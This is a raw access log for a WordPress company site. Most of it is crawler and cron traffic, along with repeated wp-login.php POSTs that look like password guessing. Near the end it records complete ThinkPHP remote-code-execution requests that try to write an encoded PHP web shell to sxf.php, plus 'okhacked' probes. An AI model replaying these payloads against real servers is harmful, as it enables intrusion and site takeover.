36.133.115.36 - - [15/Mar/2026:09:42:08 +0800] "POST /wp-cron.php?doing_wp_cron=1773538928.6372809410095214843750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
5.175.189.42 - - [15/Mar/2026:09:42:08 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 9053 "-" "-"
36.133.115.36 - - [15/Mar/2026:09:48:12 +0800] "POST /wp-cron.php?doing_wp_cron=1773539292.1048018932342529296875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
62.169.136.20 - - [15/Mar/2026:09:48:12 +0800] "POST /wp-login.php HTTP/1.1" 200 9491 "-" "Mozilla/5.0"
36.133.115.36 - - [15/Mar/2026:09:49:47 +0800] "POST /wp-cron.php?doing_wp_cron=1773539387.8928129673004150390625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
216.244.66.245 - - [15/Mar/2026:09:49:47 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.245 - - [15/Mar/2026:09:54:12 +0800] "GET /news/portfolio HTTP/1.1" 200 77809 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
36.133.115.36 - - [15/Mar/2026:09:58:53 +0800] "POST /wp-cron.php?doing_wp_cron=1773539933.2991070747375488281250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
142.44.233.209 - - [15/Mar/2026:09:58:53 +0800] "GET /2418/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
110.249.202.228 - - [15/Mar/2026:10:00:50 +0800] "GET /robots.txt HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
36.133.115.36 - - [15/Mar/2026:10:00:51 +0800] "POST /wp-cron.php?doing_wp_cron=1773540051.1225199699401855468750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
120.242.189.199 - - [15/Mar/2026:10:00:54 +0800] "GET / HTTP/1.1" 200 35258 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.105"
117.151.190.128 - - [15/Mar/2026:10:01:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.14"
121.206.56.6 - - [15/Mar/2026:10:01:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.14"
117.189.217.108 - - [15/Mar/2026:10:01:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.14"
36.133.115.36 - - [15/Mar/2026:10:01:09 +0800] "POST /wp-cron.php?doing_wp_cron=1773540069.7481799125671386718750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
118.120.232.193 - - [15/Mar/2026:10:01:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.14"
36.133.115.36 - - [15/Mar/2026:10:09:34 +0800] "POST /wp-cron.php?doing_wp_cron=1773540574.8183789253234863281250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
220.181.108.165 - - [15/Mar/2026:10:09:34 +0800] "GET /about/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.114 - - [15/Mar/2026:10:09:34 +0800] "GET /about HTTP/1.1" 200 24498 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.252 - - [15/Mar/2026:10:09:43 +0800] "GET /wp-content/uploads/2025/07/1750671801-partner2_200x50.webp HTTP/1.1" 200 3946 "http://cqqizhou.com/about" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [15/Mar/2026:10:16:29 +0800] "POST /wp-cron.php?doing_wp_cron=1773540989.5203139781951904296875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
204.76.203.18 - - [15/Mar/2026:10:16:29 +0800] "GET /bins/ HTTP/1.1" 301 5 "-" "-"
47.114.89.255 - - [15/Mar/2026:10:17:47 +0800] "POST /Admin/assets/jquery-file-upload/server/php/index.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [15/Mar/2026:10:22:05 +0800] "POST /wp-cron.php?doing_wp_cron=1773541325.0552020072937011718750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
49.51.195.195 - - [15/Mar/2026:10:22:05 +0800] "GET / HTTP/1.1" 200 34828 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Mar/2026:10:33:14 +0800] "POST /wp-cron.php?doing_wp_cron=1773541994.3073120117187500000000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
149.22.89.98 - - [15/Mar/2026:10:33:14 +0800] "POST /wp-login.php HTTP/1.1" 200 9491 "-" "Mozilla/5.0"
216.244.66.245 - - [15/Mar/2026:10:34:02 +0800] "GET /robots.txt HTTP/1.1" 200 390 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.245 - - [15/Mar/2026:10:38:52 +0800] "GET /news/page/3 HTTP/1.1" 200 95795 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun6a-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
36.133.115.36 - - [15/Mar/2026:10:50:56 +0800] "POST /wp-cron.php?doing_wp_cron=1773543056.0293939113616943359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun3a-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-hbby-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyunkknews-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-hbby-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun1a-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun5a-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun3a.live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun3a-live.bestvcdn.com/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun2a-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-rts.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-ahby-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-upcloud-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun2a-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-ahby-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-qhbu-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-ipv6-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun3a.live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun3a-live.bestvcdn.com/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-broadcast.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun7a-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyunkknews-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun7a-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun4a-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun3a-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun5a-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-rts01.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-broadcast.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-shbu-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun8a-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun1a-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun4a-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:56 +0800] "GET /aliyun-ipv6-live.bestvcdn.com.cn/1/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:57 +0800] "GET /aliyun8a-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:57 +0800] "GET /aliyun-qhbu-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
36.133.115.36 - - [15/Mar/2026:10:50:57 +0800] "POST /wp-cron.php?doing_wp_cron=1773543057.2981629371643066406250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
39.191.209.74 - - [15/Mar/2026:10:50:57 +0800] "GET /aliyun6a-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:57 +0800] "GET /aliyun-shbu-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:57 +0800] "GET /aliyun-rts.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:57 +0800] "GET /aliyun-upcloud-live.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
39.191.209.74 - - [15/Mar/2026:10:50:57 +0800] "GET /aliyun-rts01.bestvcdn.com.cn/live/program/live/cctv2/1300000/2026031323/177341403.ts HTTP/1.1" 404 31365 "-" "ZTE/1.0.6"
36.133.115.36 - - [15/Mar/2026:10:55:22 +0800] "POST /wp-cron.php?doing_wp_cron=1773543322.0156500339508056640625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
62.169.136.20 - - [15/Mar/2026:10:55:22 +0800] "POST /wp-login.php HTTP/1.1" 200 9491 "-" "Mozilla/5.0"
220.181.108.167 - - [15/Mar/2026:11:08:42 +0800] "GET /news/2388 HTTP/1.1" 200 24584 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.37.78 - - [15/Mar/2026:11:08:48 +0800] "GET /wp-content/uploads/2025/12/1766647830-Article_images_202512252.webp HTTP/1.1" 200 84832 "http://cqqizhou.com/news/2388" "Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [15/Mar/2026:11:15:06 +0800] "POST /wp-cron.php?doing_wp_cron=1773544506.8256819248199462890625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
149.88.27.130 - - [15/Mar/2026:11:15:06 +0800] "POST /wp-login.php HTTP/1.1" 200 9491 "-" "Mozilla/5.0"
36.133.115.36 - - [15/Mar/2026:11:45:40 +0800] "POST /wp-cron.php?doing_wp_cron=1773546340.6299788951873779296875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
162.142.125.222 - - [15/Mar/2026:11:45:40 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.222 - - [15/Mar/2026:11:45:47 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [15/Mar/2026:11:46:29 +0800] "POST /wp-cron.php?doing_wp_cron=1773546389.6946640014648437500000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
167.94.138.56 - - [15/Mar/2026:11:46:29 +0800] "GET /security.txt HTTP/1.1" 200 19843 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.56 - - [15/Mar/2026:11:46:52 +0800] "GET /tssfrt_ae7k7_c HTTP/1.1" 404 8949 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [15/Mar/2026:11:50:29 +0800] "POST /wp-cron.php?doing_wp_cron=1773546629.8835198879241943359375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.135.145.73 - - [15/Mar/2026:11:50:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.145.73 - - [15/Mar/2026:11:50:33 +0800] "GET / HTTP/1.1" 200 34828 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Mar/2026:11:57:13 +0800] "POST /wp-cron.php?doing_wp_cron=1773547033.2891469001770019531250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
54.39.6.32 - - [15/Mar/2026:11:57:13 +0800] "GET /2361/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [15/Mar/2026:12:13:49 +0800] "POST /wp-cron.php?doing_wp_cron=1773548029.4875190258026123046875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
49.51.166.228 - - [15/Mar/2026:12:13:49 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
49.51.166.228 - - [15/Mar/2026:12:13:52 +0800] "GET / HTTP/1.1" 200 34828 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Mar/2026:13:01:43 +0800] "POST /wp-cron.php?doing_wp_cron=1773550903.2309598922729492187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
110.249.202.56 - - [15/Mar/2026:13:01:43 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
39.98.36.122 - - [15/Mar/2026:13:14:07 +0800] "GET / HTTP/1.1" 499 0 "-" "curl/7.78.0"
36.133.115.36 - - [15/Mar/2026:13:14:07 +0800] "POST /wp-cron.php?doing_wp_cron=1773551647.3087010383605957031250 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.115.36 - - [15/Mar/2026:13:19:04 +0800] "POST /wp-cron.php?doing_wp_cron=1773551944.7822299003601074218750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
220.181.108.101 - - [15/Mar/2026:13:19:04 +0800] "GET /contacts/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
220.181.108.144 - - [15/Mar/2026:13:19:04 +0800] "GET /contacts HTTP/1.1" 200 21758 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
34.38.5.122 - - [15/Mar/2026:13:20:56 +0800] "GET / HTTP/1.1" 200 35258 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Mar/2026:13:21:46 +0800] "POST /wp-cron.php?doing_wp_cron=1773552106.1008288860321044921875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
192.252.179.78 - - [15/Mar/2026:13:21:46 +0800] "GET /aaaaa HTTP/1.1" 404 8949 "http://cqqizhou.com/aaaaa" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:47 +0800] "POST /index.php?s=index HTTP/1.1" 200 17395 "http://cqqizhou.com/index.php?s=index" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
192.252.179.78 - - [15/Mar/2026:13:21:48 +0800] "POST /index.php?s=index HTTP/1.1" 200 17396 "http://cqqizhou.com/index.php?s=index" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
192.252.179.78 - - [15/Mar/2026:13:21:48 +0800] "POST /index.php?s=index HTTP/1.1" 400 2528 "http://cqqizhou.com/index.php?s=index" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
192.252.179.78 - - [15/Mar/2026:13:21:49 +0800] "POST /index.php?s=index HTTP/1.1" 200 17396 "http://cqqizhou.com/index.php?s=index" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
192.252.179.78 - - [15/Mar/2026:13:21:50 +0800] "POST /index.php?s=index HTTP/1.1" 200 17395 "http://cqqizhou.com/index.php?s=index" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
192.252.179.78 - - [15/Mar/2026:13:21:50 +0800] "GET /sxf.php HTTP/1.1" 404 47 "http://cqqizhou.com/sxf.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:51 +0800] "GET /index.php?s=/index/%5Cthink%5CView/display&content=%22%3C?%3E%3C?php%20call_user_func(%22file_put_contents%22,%22php://filter/write=convert.base64-decode%7Cstring.rot13/resource=sxf.php%22,%22PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8%2BdXJlcg==%22)?%3E&data=1 HTTP/1.1" 200 17424 "http://cqqizhou.com/index.php?s=/index/\x5Cthink\x5CView/display&content=%22%3C?%3E%3C?php%20call_user_func(\x22file_put_contents\x22,\x22php://filter/write=convert.base64-decode|string.rot13/resource=sxf.php\x22,\x22PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8%2BdXJlcg==\x22)?%3E&data=1" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X"
192.252.179.78 - - [15/Mar/2026:13:21:51 +0800] "GET /sxf.php HTTP/1.1" 404 47 "http://cqqizhou.com/sxf.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:52 +0800] "GET /index.php?s=/index/%5Cthink%5CRequest/input&filter=var_dump&data=a6d3e827b198d120okhacked HTTP/1.1" 200 17426 "http://cqqizhou.com/index.php?s=/index/\x5Cthink\x5CRequest/input&filter=var_dump&data=a6d3e827b198d120okhacked" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X"
192.252.179.78 - - [15/Mar/2026:13:21:53 +0800] "GET /index.php?s=/index/%5Cthink%5CRequest/input&filter=var_dump&data=a6d3e827b198d120okhacked HTTP/1.1" 200 17426 "http://cqqizhou.com/index.php?s=/index/\x5Cthink\x5CRequest/input&filter=var_dump&data=a6d3e827b198d120okhacked" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:54 +0800] "GET /index.php?s=/index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=php://filter/write=convert.base64-decode%7Cstring.rot13/resource=sxf.php&content=PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8%2BdXJlcg== HTTP/1.1" 200 17441 "http://cqqizhou.com/index.php?s=/index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=php://filter/write=convert.base64-decode|string.rot13/resource=sxf.php&content=PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8%2BdXJlcg==" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:54 +0800] "GET /sxf.php HTTP/1.1" 404 47 "http://cqqizhou.com/sxf.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
192.252.179.78 - - [15/Mar/2026:13:21:55 +0800] "GET /index.php?s=/index/%5Cthink%5Cview%5Cdriver%5CPhp/display&content=%3C?php%20call_user_func(%22file_put_contents%22,%22php://filter/write=convert.base64-decode%7Cstring.rot13/resource=sxf.php%22,%22PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8%2BdXJlcg==%22);?%3E HTTP/1.1" 200 17438 "http://cqqizhou.com/index.php?s=/index/\x5Cthink\x5Cview\x5Cdriver\x5CPhp/display&content=%3C?php call_user_func(\x22file_put_contents\x22,\x22php://filter/write=convert.base64-decode|string.rot13/resource=sxf.php\x22,\x22PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8%2BdXJlcg==\x22);?%3E" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0"
